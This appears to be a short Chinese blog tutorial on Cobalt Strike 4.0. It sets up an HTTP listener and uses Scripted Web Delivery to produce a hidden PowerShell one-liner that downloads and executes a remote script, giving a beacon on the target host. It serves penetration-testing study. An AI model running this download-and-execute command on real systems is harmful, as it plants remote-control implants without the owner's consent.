0
点赞
收藏
分享

微信扫一扫

Cobaltstrike4.0系列 -- Beacon HTTP


讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。

----  网易云热评

一、新建Listeners,点击save

Cobaltstrike4.0系列  -- Beacon HTTP_web安全

二、利用powershell命令获取目标主机的Beacon

1、选择Attacks--Web Drive-by--Scripted web Delivery

Cobaltstrike4.0系列  -- Beacon HTTP_shell命令_02

2、选择添加的Listener,点击Launch

Cobaltstrike4.0系列  -- Beacon HTTP_Cobaltstrike4.0_03

3、获取powershell的单行指令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.133:8888/a'))"

Cobaltstrike4.0系列  -- Beacon HTTP_web安全_04

 

4、在目标主机的powershell中运行

Cobaltstrike4.0系列  -- Beacon HTTP_shell命令_05

 

5、目标主机上线

Cobaltstrike4.0系列  -- Beacon HTTP_shell命令_06

 

 

 

 

禁止非法,后果自负

Cobaltstrike4.0系列  -- Beacon HTTP_网易云_07

 

 

举报

相关推荐

0 条评论